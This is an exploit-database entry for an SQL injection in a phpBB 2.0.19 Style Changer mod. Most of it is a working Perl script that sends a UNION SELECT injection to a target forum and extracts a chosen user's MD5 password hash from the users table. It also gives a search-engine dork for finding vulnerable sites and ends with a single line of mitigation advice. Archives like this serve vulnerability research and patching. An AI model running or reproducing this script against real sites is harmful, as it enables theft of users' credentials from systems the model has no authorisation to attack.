phpBB Style Changer/Demo Mod-->GET HASH EXPLOIT

vendor:

phpBB

by:

SkOd

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: phpBB

Affected Version From: phpBB 2.0.19

Affected Version To: phpBB 2.0.19

Patch Exists: YES

Related CWE: N/A

CPE: a:phpbb:phpbb

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

phpBB Style Changer/Demo Mod–>GET HASH EXPLOIT

This exploit allows an attacker to gain access to the user's password hash by exploiting a SQL injection vulnerability in phpBB 2.0.19.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in a SQL query.

Source

Exploit-DB raw data:

#!/usr/bin/perl
#########################################################
#		 _______ _______ ______ 		#
#		 |______ |______ |     \		#
#		 ______| |______ |_____/		#
#		                        		#
#phpBB Style Changer/Demo Mod-->GET HASH EXPLOIT	#
#Created By SkOd                                        #
#SED security Team                                      #
#http://www.sed-team.be                                 #
#skod.uk@gmail.com                                      #
#ISRAEL                                                 #
#########################################################
#google:
#"Powered by phpBB" inurl:"index.php?s" OR inurl:"index.php?style"
#########################################################
use IO::Socket;
if (@ARGV < 3){
print q{
############################################################
#   phpBB Style Changer\Viewer MOD SQL injection Exploit   #
#		Tested on phpBB 2.0.19			   #
#	    created By SkOd. SED Security Team             #
############################################################
	bbstyle.pl [HOST] [PATH] [Target id]
	 bbstyle.pl www.host.com /phpbb2/ 2
############################################################
};
exit;
}
$serv = $ARGV[0];
$dir = $ARGV[1];
$id = $ARGV[2];
print "[+]Make Connection\n";
$serv =~ s/(http:\/\/)//eg;
$path = $dir.'index.php?s=-99%20UNION%20SELECT%20null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20Where%20user_id='.$id.'/*';
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-]Connect Failed\r\n";
print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "[+]Connected\n";
while ($hash = <$socket>){
$hash =~ m/open(.*?)template/ && print "[+]User id: $id\n[+]Md5 Hash: $1\n";
}

# milw0rm.com [2006-02-05]